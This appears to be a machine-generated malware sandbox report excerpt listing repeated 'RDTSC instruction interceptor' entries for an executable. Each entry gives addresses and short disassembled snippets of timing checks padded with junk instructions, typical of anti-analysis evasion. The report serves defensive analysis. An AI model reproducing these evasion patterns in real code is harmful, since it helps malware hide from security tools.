                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E9B0B second address: 6E9B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2ADCE78B47h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E9B28 second address: 6E9B30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E9B30 second address: 6E9B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E9B34 second address: 6E9B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6E863F second address: 6E865C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F2ADCE78B46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6EEF7E second address: 6EEF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6EEF84 second address: 6EEF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F22F7 second address: 6F2303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2ADCE7BD66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F2303 second address: 6F2307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F38D1 second address: 6F38F0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jne 00007F2ADCE7BD6Ch 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F38F0 second address: 6F38F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F38F8 second address: 6F38FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F6719 second address: 6F673C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2ADCE78B49h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F673C second address: 6F6748 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F6748 second address: 6F6763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B47h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F6433 second address: 6F6459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007F2ADCE7BD81h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6F8B03 second address: 6F8B0F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007F2ADCE78B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6FD0A1 second address: 6FD0B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2ADCE7BD6Eh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6FD0B7 second address: 6FD0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6FD4E9 second address: 6FD4EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6FD4EF second address: 6FD4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6FD4F5 second address: 6FD4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6FD4F9 second address: 6FD4FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6FD4FD second address: 6FD509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6FD509 second address: 6FD50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 66FF07 second address: 66FF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jns 00007F2ADCE7BD66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 701FB9 second address: 701FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7020F8 second address: 70212A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2ADCE7BD74h 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AB661 second address: 6AB675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE78B40h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70308A second address: 70308E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70659F second address: 7065AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B3Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7065AF second address: 7065B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 706739 second address: 70675E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2ADCE78B47h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 706BB1 second address: 706BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 706D0D second address: 706D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F2ADCE78B3Dh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 706E86 second address: 706EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2ADCE7BD72h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70FD5E second address: 70FD77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70FD77 second address: 70FD91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70FD91 second address: 70FD95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70FD95 second address: 70FDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2ADCE7BD66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70FDA4 second address: 70FDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70FDAA second address: 70FDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70DD34 second address: 70DD39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70DE79 second address: 70DEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE7BD79h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2ADCE7BD6Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70E018 second address: 70E04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F2ADCE78B46h 0x0000000c jmp 00007F2ADCE78B46h 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70E31E second address: 70E325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70E5DC second address: 70E5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F2ADCE78B40h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70EB65 second address: 70EBA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2ADCE7BD6Bh 0x0000000e push esi 0x0000000f jmp 00007F2ADCE7BD75h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70EBA6 second address: 70EBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70F419 second address: 70F420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70FABA second address: 70FABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 70FABE second address: 70FAE1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2ADCE7BD77h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 715325 second address: 715333 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F2ADCE78B36h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 715333 second address: 715339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 715339 second address: 715351 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2ADCE78B3Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71857B second address: 718590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 ja 00007F2ADCE7BD66h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 718D69 second address: 718D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 718D82 second address: 718D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 718D88 second address: 718D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 721BFA second address: 721C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 jng 00007F2ADCE7BD6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F2ADCE7BD66h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FE6F second address: 71FE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2ADCE78B44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FE89 second address: 71FEC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD72h 0x00000007 jmp 00007F2ADCE7BD78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F2ADCE7BD66h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FEC2 second address: 71FECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FECC second address: 71FEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE7BD73h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720018 second address: 72001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720430 second address: 720453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2ADCE7BD66h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F2ADCE7BD73h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720453 second address: 72046C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B3Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 72070F second address: 720718 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720718 second address: 72071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 72071E second address: 720730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2ADCE7BD66h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720730 second address: 72073C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F2ADCE78B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720851 second address: 720855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209BA second address: 7209BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209BE second address: 7209C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209C9 second address: 7209CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209CD second address: 7209D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209D1 second address: 7209F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2ADCE78B3Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2ADCE78B3Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 7209F5 second address: 7209F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 720B96 second address: 720BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FAAD second address: 71FAB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 727C5A second address: 727C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 727C65 second address: 727C7F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F2ADCE7BD66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2ADCE7BD6Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 727C7F second address: 727C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 72A3B3 second address: 72A3D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2ADCE7BD6Bh 0x0000000a jnc 00007F2ADCE7BD66h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F2ADCE7BD66h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 735022 second address: 735028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 735198 second address: 7351A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F2ADCE7BD66h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 736C7B second address: 736C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 736C7F second address: 736C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F2ADCE7BD6Fh 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73C7BD second address: 73C7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73C7C2 second address: 73C7C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73C7C8 second address: 73C7F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F2ADCE78B46h 0x0000000f jmp 00007F2ADCE78B40h 0x00000014 jmp 00007F2ADCE78B3Eh 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73C3AE second address: 73C3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73DE70 second address: 73DE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F2ADCE78B42h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 73DE93 second address: 73DE9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 753730 second address: 753768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B43h 0x00000007 jmp 00007F2ADCE78B49h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F2ADCE78B3Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
